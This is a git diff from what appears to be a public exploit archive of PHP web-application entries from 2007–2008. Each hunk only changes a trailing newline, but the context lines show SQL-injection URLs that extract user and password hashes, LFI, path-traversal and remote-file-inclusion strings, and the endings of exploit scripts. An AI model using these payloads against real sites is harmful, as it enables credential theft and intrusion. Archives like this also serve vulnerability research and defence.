milw0rm.com [2007-12-28] +# milw0rm.com [2007-12-28] \ No newline at end of file diff --git a/platforms/php/webapps/4802.txt b/platforms/php/webapps/4802.txt index b8d5aa84c..5b3fc5f12 100755 --- a/platforms/php/webapps/4802.txt +++ b/platforms/php/webapps/4802.txt @@ -17,4 +17,4 @@ now upload that image on your panel, and exploit rce trough lfi: http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../uploads/avatar/[your_username].jpg\0 -# milw0rm.com [2007-12-28] +# milw0rm.com [2007-12-28] \ No newline at end of file diff --git a/platforms/php/webapps/4804.txt b/platforms/php/webapps/4804.txt index e9ba7375a..7ec937f54 100755 --- a/platforms/php/webapps/4804.txt +++ b/platforms/php/webapps/4804.txt @@ -37,4 +37,4 @@ Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends Happy Aid All Muslims Best Wishes -# milw0rm.com [2007-12-28] +# milw0rm.com [2007-12-28] \ No newline at end of file diff --git a/platforms/php/webapps/4805.txt b/platforms/php/webapps/4805.txt index 7877117fe..19c876efb 100755 --- a/platforms/php/webapps/4805.txt +++ b/platforms/php/webapps/4805.txt @@ -118,4 +118,4 @@ Disclaimer and Copyright ############################################################################ -# milw0rm.com [2007-12-28] +# milw0rm.com [2007-12-28] \ No newline at end of file diff --git a/platforms/php/webapps/4807.php b/platforms/php/webapps/4807.php index 5a45a63fc..f0a42ffd0 100755 --- a/platforms/php/webapps/4807.php +++ b/platforms/php/webapps/4807.php @@ -68,4 +68,4 @@ function send($host, $port, $packet) } ?> -# milw0rm.com [2007-12-29] +# milw0rm.com [2007-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/4808.txt b/platforms/php/webapps/4808.txt index 54dcd2e18..58679c4d7 100755 --- a/platforms/php/webapps/4808.txt +++ b/platforms/php/webapps/4808.txt @@ -18,4 +18,4 @@ ###### TrYaG-TeaM , H-T Team , RoMaNcYxHaCkEr , Asb-May's Team & ALL ##### #################################################################################### -# milw0rm.com [2007-12-29] +# milw0rm.com [2007-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/4809.txt b/platforms/php/webapps/4809.txt index 62f4d9f44..43c08f826 100755 --- a/platforms/php/webapps/4809.txt +++ b/platforms/php/webapps/4809.txt @@ -55,4 +55,4 @@ print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; print "[+] Exploit Failed!\n"; } -# milw0rm.com [2007-12-29] +# milw0rm.com [2007-12-29] \ No newline at end of file diff --git a/platforms/php/webapps/4810.txt b/platforms/php/webapps/4810.txt index d93cfe81f..4904399fa 100755 --- a/platforms/php/webapps/4810.txt +++ b/platforms/php/webapps/4810.txt @@ -36,4 +36,4 @@ dork.....: "This site is powered by CMS Made Simple version 1.2.2" http://[host]/[path]/modules/TinyMCE/content_css.php?templateid=-1/**/UNION/**/SELECT/**/username,1,password/**/FROM/**/{prefix}_users/* -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/4811.txt b/platforms/php/webapps/4811.txt index 0e107cc3d..46702bc99 100755 --- a/platforms/php/webapps/4811.txt +++ b/platforms/php/webapps/4811.txt @@ -36,4 +36,4 @@ Greetings: str0ke, TheJT, Luna-Tic, DNX Contact: bd0rk[at]hackermail.com -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/4812.txt b/platforms/php/webapps/4812.txt index d2eb0e28f..b46c1b3de 100755 --- a/platforms/php/webapps/4812.txt +++ b/platforms/php/webapps/4812.txt @@ -22,4 +22,4 @@ ###### TrYaG-TeaM , H-T Team , RoMaNcYxHaCkEr , Asb-May's Team & ALL ##### #################################################################################### -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/4813.txt b/platforms/php/webapps/4813.txt index 719db216e..94995ba80 100755 --- a/platforms/php/webapps/4813.txt +++ b/platforms/php/webapps/4813.txt @@ -103,4 +103,4 @@ Code : } ?> -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/4814.txt b/platforms/php/webapps/4814.txt index d2e5e67fd..5bbf7e466 100755 --- a/platforms/php/webapps/4814.txt +++ b/platforms/php/webapps/4814.txt @@ -74,4 +74,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/4815.txt b/platforms/php/webapps/4815.txt index a00db0cce..703d3b7e7 100755 --- a/platforms/php/webapps/4815.txt +++ b/platforms/php/webapps/4815.txt @@ -36,4 +36,4 @@ * +_______________________________________________________________________________________________________________________+ -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/4816.txt b/platforms/php/webapps/4816.txt index 2ca31b608..f053d1aae 100755 --- a/platforms/php/webapps/4816.txt +++ b/platforms/php/webapps/4816.txt @@ -21,4 +21,4 @@ Thanx: [cold-zer0]==&==[kof]==&==[firas] GreeTz: [M]oRoCCaN [S]aBoTaGe [T]eaM -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/4817.txt b/platforms/php/webapps/4817.txt index ed1e7e35e..b4f898014 100755 --- a/platforms/php/webapps/4817.txt +++ b/platforms/php/webapps/4817.txt @@ -21,4 +21,4 @@ DORK: allinurl:"index.php?site=" "W-Agora" #ihteam.net - Inclusion Hunter Team -# milw0rm.com [2007-12-30] +# milw0rm.com [2007-12-30] \ No newline at end of file diff --git a/platforms/php/webapps/4821.txt b/platforms/php/webapps/4821.txt index 05384e2ac..1c23ec8e5 100755 --- a/platforms/php/webapps/4821.txt +++ b/platforms/php/webapps/4821.txt @@ -32,4 +32,4 @@ In the admincp.php , in general settings, u can insert a html code for redirect --------------------------------------------------------------- -# milw0rm.com [2007-12-31] +# milw0rm.com [2007-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/4822.txt b/platforms/php/webapps/4822.txt index daa8acb27..a814eb272 100755 --- a/platforms/php/webapps/4822.txt +++ b/platforms/php/webapps/4822.txt @@ -51,4 +51,4 @@ PoC: http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/* -# milw0rm.com [2007-12-31] +# milw0rm.com [2007-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/4823.pl b/platforms/php/webapps/4823.pl index 23bcf3dc8..6fdb04aa6 100755 --- a/platforms/php/webapps/4823.pl +++ b/platforms/php/webapps/4823.pl @@ -55,4 +55,4 @@ if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";} else{print "\n[-] Exploit Failed...\n";} -# milw0rm.com [2007-12-31] +# milw0rm.com [2007-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/4826.pl b/platforms/php/webapps/4826.pl index d7670e120..4b5a4e184 100755 --- a/platforms/php/webapps/4826.pl +++ b/platforms/php/webapps/4826.pl @@ -35,4 +35,4 @@ print "[+]Ok, hash for username with userid ".$ARGV[1]." is $1\n"; print "[+]Exploiting terminated.\n"; print "[+]Coded by x0kster\n"; -# milw0rm.com [2007-12-31] +# milw0rm.com [2007-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/4827.txt b/platforms/php/webapps/4827.txt index df09ce16d..b50a10e9f 100755 --- a/platforms/php/webapps/4827.txt +++ b/platforms/php/webapps/4827.txt @@ -26,4 +26,4 @@ http://server.com/Path/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20 Joomla Component PU Arcade Remote SQL Injection Exploit ######################################################################### -# milw0rm.com [2007-12-31] +# milw0rm.com [2007-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/4828.txt b/platforms/php/webapps/4828.txt index 7a758b1a6..b29645134 100755 --- a/platforms/php/webapps/4828.txt +++ b/platforms/php/webapps/4828.txt @@ -16,4 +16,4 @@ ###### TrYaG-TeaM [Tryag.com/cc], H-T Team , RoMaNcYxHaCkEr , Asb-May's Team ##### #################################################################################### -# milw0rm.com [2008-01-01] +# milw0rm.com [2008-01-01] \ No newline at end of file diff --git a/platforms/php/webapps/4830.txt b/platforms/php/webapps/4830.txt index e8cf92725..de393958b 100755 --- a/platforms/php/webapps/4830.txt +++ b/platforms/php/webapps/4830.txt @@ -16,4 +16,4 @@ http://server.com/Path/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,ch ## GREETZ : Exploiters,Pongz,{OHM},Usermode,windows98SE,azazel,Tesz,Mr`Ping ########################################################################### -# milw0rm.com [2008-01-02] +# milw0rm.com [2008-01-02] \ No newline at end of file diff --git a/platforms/php/webapps/4831.txt b/platforms/php/webapps/4831.txt index 011ce9123..4e53ea115 100755 --- a/platforms/php/webapps/4831.txt +++ b/platforms/php/webapps/4831.txt @@ -119,4 +119,4 @@ if($_POST['submit']) { # Use this at your own risk. You are responsible for your own deeds. # #=================================================================================================# -# milw0rm.com [2008-01-03] +# milw0rm.com [2008-01-03] \ No newline at end of file diff --git a/platforms/php/webapps/4832.php b/platforms/php/webapps/4832.php index 342f61bed..d97823623 100755 --- a/platforms/php/webapps/4832.php +++ b/platforms/php/webapps/4832.php @@ -173,4 +173,4 @@ print "\n\n[-] Successfull!\n"; ?> -# milw0rm.com [2008-01-03] +# milw0rm.com [2008-01-03] \ No newline at end of file diff --git a/platforms/php/webapps/4833.txt b/platforms/php/webapps/4833.txt index 96f41c62c..f89e36322 100755 --- a/platforms/php/webapps/4833.txt +++ b/platforms/php/webapps/4833.txt @@ -29,4 +29,4 @@ http://server.com/Path/index.php?page=[-LFI-] # # # ######################################################################### -# milw0rm.com [2008-01-04] +# milw0rm.com [2008-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/4834.txt b/platforms/php/webapps/4834.txt index 4ed72da44..624e7dbed 100755 --- a/platforms/php/webapps/4834.txt +++ b/platforms/php/webapps/4834.txt @@ -38,4 +38,4 @@ * +_______________________________________________________________________________________________________________________+ -# milw0rm.com [2008-01-04] +# milw0rm.com [2008-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/4835.py b/platforms/php/webapps/4835.py index 28d8d53cf..52c5dd62f 100755 --- a/platforms/php/webapps/4835.py +++ b/platforms/php/webapps/4835.py @@ -121,4 +121,4 @@ for i in range(10000,19999): print "[-]Not Found. Exploit Failed." -# milw0rm.com [2008-01-04] +# milw0rm.com [2008-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/4836.txt b/platforms/php/webapps/4836.txt index bcad68eee..94d4c02eb 100755 --- a/platforms/php/webapps/4836.txt +++ b/platforms/php/webapps/4836.txt @@ -8,4 +8,4 @@ Dork2:This page was produced using SAM Broadcaster. © Copyright Spacial Audio Exploit: www.victim.com/scriptpath/songinfo.php?songid=-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,password,user,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44/**/from/**/mysql.user -# milw0rm.com [2008-01-05] +# milw0rm.com [2008-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/4837.pl b/platforms/php/webapps/4837.pl index a6e948f6c..b3d5548b7 100755 --- a/platforms/php/webapps/4837.pl +++ b/platforms/php/webapps/4837.pl @@ -45,4 +45,4 @@ else{ print "Wrong ID or path!"; } -# milw0rm.com [2008-01-05] +# milw0rm.com [2008-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/4838.txt b/platforms/php/webapps/4838.txt index 48527f59b..8150ca6a0 100755 --- a/platforms/php/webapps/4838.txt +++ b/platforms/php/webapps/4838.txt @@ -39,4 +39,4 @@ * +_______________________________________________________________________________________________________________________+ -# milw0rm.com [2008-01-05] +# milw0rm.com [2008-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/4840.php b/platforms/php/webapps/4840.php index 4fb25ef04..99d89cc58 100755 --- a/platforms/php/webapps/4840.php +++ b/platforms/php/webapps/4840.php @@ -122,4 +122,4 @@ if(strstr($response,"x0kster")){ ?> -# milw0rm.com [2008-01-05] +# milw0rm.com [2008-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/4841.txt b/platforms/php/webapps/4841.txt index 32ccf13b0..f7c1a6a3e 100755 --- a/platforms/php/webapps/4841.txt +++ b/platforms/php/webapps/4841.txt @@ -91,4 +91,4 @@ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] OSVDB: 51280, 51281 -# milw0rm.com [2008-01-05] +# milw0rm.com [2008-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/4842.pl b/platforms/php/webapps/4842.pl index d0e803360..cf3fbfd3c 100755 --- a/platforms/php/webapps/4842.pl +++ b/platforms/php/webapps/4842.pl @@ -64,4 +64,4 @@ if($content =~ /username->/) { } # http://cod3rz.helloweb.eu -# milw0rm.com [2008-01-05] +# milw0rm.com [2008-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/4843.txt b/platforms/php/webapps/4843.txt index b7114b041..5b2010d01 100755 --- a/platforms/php/webapps/4843.txt +++ b/platforms/php/webapps/4843.txt @@ -104,4 +104,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-01-05] +# milw0rm.com [2008-01-05] \ No newline at end of file diff --git a/platforms/php/webapps/4844.txt b/platforms/php/webapps/4844.txt index 7446f4253..324207c6e 100755 --- a/platforms/php/webapps/4844.txt +++ b/platforms/php/webapps/4844.txt @@ -35,4 +35,4 @@ # H-T TeaM {HouSSaMix _ ToXiC350} # ###################################################################################### -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4845.pl b/platforms/php/webapps/4845.pl index 2a1f9dce1..18dd4c4c6 100755 --- a/platforms/php/webapps/4845.pl +++ b/platforms/php/webapps/4845.pl @@ -225,4 +225,4 @@ $InfoWindow->destroy; } -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4846.txt b/platforms/php/webapps/4846.txt index 3c322a9d4..ea32e8651 100755 --- a/platforms/php/webapps/4846.txt +++ b/platforms/php/webapps/4846.txt @@ -72,4 +72,4 @@ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4847.txt b/platforms/php/webapps/4847.txt index ae3a05209..1e22f5427 100755 --- a/platforms/php/webapps/4847.txt +++ b/platforms/php/webapps/4847.txt @@ -58,4 +58,4 @@ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4849.txt b/platforms/php/webapps/4849.txt index 232534adb..d8303e2e8 100755 --- a/platforms/php/webapps/4849.txt +++ b/platforms/php/webapps/4849.txt @@ -39,4 +39,4 @@ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4850.txt b/platforms/php/webapps/4850.txt index 31c258384..586f32db4 100755 --- a/platforms/php/webapps/4850.txt +++ b/platforms/php/webapps/4850.txt @@ -52,4 +52,4 @@ 1st advisory: http://www.securityfocus.com/archive/1/427710/30/0/threaded -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4851.txt b/platforms/php/webapps/4851.txt index f07ca9dbe..ed708dccd 100755 --- a/platforms/php/webapps/4851.txt +++ b/platforms/php/webapps/4851.txt @@ -35,4 +35,4 @@ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4852.txt b/platforms/php/webapps/4852.txt index 4a14ccd03..ae3a261cb 100755 --- a/platforms/php/webapps/4852.txt +++ b/platforms/php/webapps/4852.txt @@ -35,4 +35,4 @@ http://site.com/patch/index.php?page= ######################## NetRisk contains of other sql injecton/xss/LFI bugs in other pages ;) -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4853.php b/platforms/php/webapps/4853.php index 6dd3e6955..f810eaf6f 100755 --- a/platforms/php/webapps/4853.php +++ b/platforms/php/webapps/4853.php @@ -75,4 +75,4 @@ if(strstr($response,"x0kster")){ ?> -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4854.txt b/platforms/php/webapps/4854.txt index 078290920..0205c4e00 100755 --- a/platforms/php/webapps/4854.txt +++ b/platforms/php/webapps/4854.txt @@ -86,4 +86,4 @@ http://localhost/sinecms/mods/Integrated/index.php?sine[config][index_main]=.. /../../setup.php%00 [*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4855.txt b/platforms/php/webapps/4855.txt index f6d6ed83e..bc95cf627 100755 --- a/platforms/php/webapps/4855.txt +++ b/platforms/php/webapps/4855.txt @@ -28,4 +28,4 @@ http://site.com/Script/index.php?aux_page=../../../../../etc/passwd ########################################################################### -# milw0rm.com [2008-01-06] +# milw0rm.com [2008-01-06] \ No newline at end of file diff --git a/platforms/php/webapps/4857.txt b/platforms/php/webapps/4857.txt index ec46ffc07..61e81f195 100755 --- a/platforms/php/webapps/4857.txt +++ b/platforms/php/webapps/4857.txt @@ -107,4 +107,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-01-07] +# milw0rm.com [2008-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/4858.pl b/platforms/php/webapps/4858.pl index bcb8a0602..7a7be2df2 100755 --- a/platforms/php/webapps/4858.pl +++ b/platforms/php/webapps/4858.pl @@ -164,4 +164,4 @@ $InfoWindow->destroy; } -# milw0rm.com [2008-01-07] +# milw0rm.com [2008-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/4859.txt b/platforms/php/webapps/4859.txt index bba8b8e6d..134245c25 100755 --- a/platforms/php/webapps/4859.txt +++ b/platforms/php/webapps/4859.txt @@ -29,4 +29,4 @@ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] -# milw0rm.com [2008-01-07] +# milw0rm.com [2008-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/4860.pl b/platforms/php/webapps/4860.pl index fa5035e3f..d5e2680d3 100755 --- a/platforms/php/webapps/4860.pl +++ b/platforms/php/webapps/4860.pl @@ -131,4 +131,4 @@ } } -# milw0rm.com [2008-01-07] +# milw0rm.com [2008-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/4861.txt b/platforms/php/webapps/4861.txt index af468b9c7..f659e23f8 100755 --- a/platforms/php/webapps/4861.txt +++ b/platforms/php/webapps/4861.txt @@ -33,4 +33,4 @@ # H-T TeaM {HouSSaMix _ ToXiC350} # ###################################################################################### -# milw0rm.com [2008-01-07] +# milw0rm.com [2008-01-07] \ No newline at end of file diff --git a/platforms/php/webapps/4863.pl b/platforms/php/webapps/4863.pl index a2d60ba9c..90f23da9d 100755 --- a/platforms/php/webapps/4863.pl +++ b/platforms/php/webapps/4863.pl @@ -130,4 +130,4 @@ } } -# milw0rm.com [2008-01-08] +# milw0rm.com [2008-01-08] \ No newline at end of file diff --git a/platforms/php/webapps/4864.txt b/platforms/php/webapps/4864.txt index c116dee69..f716ac394 100755 --- a/platforms/php/webapps/4864.txt +++ b/platforms/php/webapps/4864.txt @@ -60,4 +60,4 @@ | check, if u want u can find that yourself, dont you? :P | [*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] -# milw0rm.com [2008-01-08] +# milw0rm.com [2008-01-08] \ No newline at end of file diff --git a/platforms/php/webapps/4865.txt b/platforms/php/webapps/4865.txt index 02253b8bd..4862d317f 100755 --- a/platforms/php/webapps/4865.txt +++ b/platforms/php/webapps/4865.txt @@ -23,4 +23,4 @@ http://host/EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username # thanks vangelis, AmesianX -# milw0rm.com [2008-01-08] +# milw0rm.com [2008-01-08] \ No newline at end of file diff --git a/platforms/php/webapps/4867.pl b/platforms/php/webapps/4867.pl index 00eb75b1b..e56d6cb95 100755 --- a/platforms/php/webapps/4867.pl +++ b/platforms/php/webapps/4867.pl @@ -40,4 +40,4 @@ if ($host !~ /^http:/){ $host = 'http://'.$host; } print "\n[-] exploit failed\n"; } -# milw0rm.com [2008-01-08] +# milw0rm.com [2008-01-08] \ No newline at end of file diff --git a/platforms/php/webapps/4870.txt b/platforms/php/webapps/4870.txt index 55a85de13..e81538952 100755 --- a/platforms/php/webapps/4870.txt +++ b/platforms/php/webapps/4870.txt @@ -29,4 +29,4 @@ Plestine Hackers SQl Command : 0 update palestine set palestine = 'Long live My Homeland'; ========================================================================= -# milw0rm.com [2008-01-09] +# milw0rm.com [2008-01-09] \ No newline at end of file diff --git a/platforms/php/webapps/4871.php b/platforms/php/webapps/4871.php index d263c4d45..56d117c30 100755 --- a/platforms/php/webapps/4871.php +++ b/platforms/php/webapps/4871.php @@ -145,4 +145,4 @@ sendpacket($packet); echo "New Password Is 123456"; ?> -# milw0rm.com [2008-01-09] +# milw0rm.com [2008-01-09] \ No newline at end of file diff --git a/platforms/php/webapps/4872.txt b/platforms/php/webapps/4872.txt index 108ced543..0aa1fe6ed 100755 --- a/platforms/php/webapps/4872.txt +++ b/platforms/php/webapps/4872.txt @@ -30,4 +30,4 @@ http://[www.example.com]/admin/backup_phpwebquest.php [*]---------------------------------------------------------- -# milw0rm.com [2008-01-09] +# milw0rm.com [2008-01-09] \ No newline at end of file diff --git a/platforms/php/webapps/4876.txt b/platforms/php/webapps/4876.txt index bc9b39b45..6bcc830fb 100755 --- a/platforms/php/webapps/4876.txt +++ b/platforms/php/webapps/4876.txt @@ -61,4 +61,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-01-09] +# milw0rm.com [2008-01-09] \ No newline at end of file diff --git a/platforms/php/webapps/4879.php b/platforms/php/webapps/4879.php index 61abca0a4..71890cdce 100755 --- a/platforms/php/webapps/4879.php +++ b/platforms/php/webapps/4879.php @@ -146,4 +146,4 @@ while(1) ?> -# milw0rm.com [2008-01-09] +# milw0rm.com [2008-01-09] \ No newline at end of file diff --git a/platforms/php/webapps/4880.php b/platforms/php/webapps/4880.php index c29004ce8..3720e043c 100755 --- a/platforms/php/webapps/4880.php +++ b/platforms/php/webapps/4880.php @@ -337,4 +337,4 @@ else { -# milw0rm.com [2008-01-10] +# milw0rm.com [2008-01-10] \ No newline at end of file diff --git a/platforms/php/webapps/4882.txt b/platforms/php/webapps/4882.txt index 0a15d0fae..ed042fd68 100755 --- a/platforms/php/webapps/4882.txt +++ b/platforms/php/webapps/4882.txt @@ -29,4 +29,4 @@ Admin@service.com MTCMS contains of other bugs in other pages ;) & maybe other versions have Vulnerbility too :) -# milw0rm.com [2008-01-10] +# milw0rm.com [2008-01-10] \ No newline at end of file diff --git a/platforms/php/webapps/4883.txt b/platforms/php/webapps/4883.txt index f89076411..a3c549f63 100755 --- a/platforms/php/webapps/4883.txt +++ b/platforms/php/webapps/4883.txt @@ -31,4 +31,4 @@ Visit : http://no-hack.net && http://tryag.cc/cc DomPHP v0.81 Remote File Inclusion Vulnerability ######################################################################### -# milw0rm.com [2008-01-10] +# milw0rm.com [2008-01-10] \ No newline at end of file diff --git a/platforms/php/webapps/4884.php b/platforms/php/webapps/4884.php index 7bc7c637f..ae786ade9 100755 --- a/platforms/php/webapps/4884.php +++ b/platforms/php/webapps/4884.php @@ -145,4 +145,4 @@ sendpacketii($packet); echo "Evilsentinel is off\r\n"; ?> -# milw0rm.com [2008-01-10] +# milw0rm.com [2008-01-10] \ No newline at end of file diff --git a/platforms/php/webapps/4886.pl b/platforms/php/webapps/4886.pl index 8ab6e2a9f..abe6e24ad 100755 --- a/platforms/php/webapps/4886.pl +++ b/platforms/php/webapps/4886.pl @@ -85,4 +85,4 @@ else { $hash = 'SITE UNVULNERABLE'} } -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4887.htm b/platforms/php/webapps/4887.htm index 60d207542..d4ba35cf6 100755 --- a/platforms/php/webapps/4887.htm +++ b/platforms/php/webapps/4887.htm @@ -126,4 +126,4 @@ Hidden inputs -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4888.txt b/platforms/php/webapps/4888.txt index 4bd0045ae..7300f7f37 100755 --- a/platforms/php/webapps/4888.txt +++ b/platforms/php/webapps/4888.txt @@ -38,4 +38,4 @@ There is other more sql injection... [*]---------------------------------------------------------- -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4889.txt b/platforms/php/webapps/4889.txt index 487b50265..e4edafec1 100755 --- a/platforms/php/webapps/4889.txt +++ b/platforms/php/webapps/4889.txt @@ -12,4 +12,4 @@ bug found: "http://www.site.net/index.php?abs_path=[shell]" "http://www.site.net/checkout.php?abs_path=[shell]" -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4890.txt b/platforms/php/webapps/4890.txt index 2289a60cb..8718df48f 100755 --- a/platforms/php/webapps/4890.txt +++ b/platforms/php/webapps/4890.txt @@ -33,4 +33,4 @@ ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4891.php b/platforms/php/webapps/4891.php index 4dab7eee4..ed055a51b 100755 --- a/platforms/php/webapps/4891.php +++ b/platforms/php/webapps/4891.php @@ -165,4 +165,4 @@ echo "admin: ".$admin."\n";//remove slash when you login echo "md5 hash: ".$pass."\n"; ?> -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4895.txt b/platforms/php/webapps/4895.txt index c42a36f79..15bb63ebe 100755 --- a/platforms/php/webapps/4895.txt +++ b/platforms/php/webapps/4895.txt @@ -45,4 +45,4 @@ Edit the source code to insure that all user input is properly sanitised. Cheers, dB -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4896.pl b/platforms/php/webapps/4896.pl index 6b29670cf..8f352d114 100755 --- a/platforms/php/webapps/4896.pl +++ b/platforms/php/webapps/4896.pl @@ -32,4 +32,4 @@ if ($res->is_success) { } con(); -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4897.pl b/platforms/php/webapps/4897.pl index 6858f6b8e..3965d5fc4 100755 --- a/platforms/php/webapps/4897.pl +++ b/platforms/php/webapps/4897.pl @@ -54,4 +54,4 @@ else{ print "[+] Exploit Failed...\n"; } -# milw0rm.com [2008-01-11] +# milw0rm.com [2008-01-11] \ No newline at end of file diff --git a/platforms/php/webapps/4898.txt b/platforms/php/webapps/4898.txt index 1b327c6e9..2025a6ced 100755 --- a/platforms/php/webapps/4898.txt +++ b/platforms/php/webapps/4898.txt @@ -23,4 +23,4 @@ http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user user and password from mysql.user: http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/* -# milw0rm.com [2008-01-12] +# milw0rm.com [2008-01-12] \ No newline at end of file diff --git a/platforms/php/webapps/4899.txt b/platforms/php/webapps/4899.txt index 767c03807..942896411 100755 --- a/platforms/php/webapps/4899.txt +++ b/platforms/php/webapps/4899.txt @@ -59,4 +59,4 @@ # WebSite: http://www.thedefaced.org # ################################################################################################## -# milw0rm.com [2008-01-12] +# milw0rm.com [2008-01-12] \ No newline at end of file diff --git a/platforms/php/webapps/4901.txt b/platforms/php/webapps/4901.txt index 609ae67cd..24328d82f 100755 --- a/platforms/php/webapps/4901.txt +++ b/platforms/php/webapps/4901.txt @@ -34,4 +34,4 @@ POC: http://[host]/activate.php?userName='/**/union/**/select/**/1,2,3,4,concat( The encription of password is MD5 login: http://[host]/admin -# milw0rm.com [2008-01-12] +# milw0rm.com [2008-01-12] \ No newline at end of file diff --git a/platforms/php/webapps/4902.txt b/platforms/php/webapps/4902.txt index 3fe7fb136..aa9ddb1bb 100755 --- a/platforms/php/webapps/4902.txt +++ b/platforms/php/webapps/4902.txt @@ -30,4 +30,4 @@ $thumb = $_GET['thumb']; # H-T TeaM {HouSSaMix _ ToXiC350} from MoRoCCo # ###################################################################################### -# milw0rm.com [2008-01-13] +# milw0rm.com [2008-01-13] \ No newline at end of file diff --git a/platforms/php/webapps/4904.txt b/platforms/php/webapps/4904.txt index 9332eed85..2e6be8ae9 100755 --- a/platforms/php/webapps/4904.txt +++ b/platforms/php/webapps/4904.txt 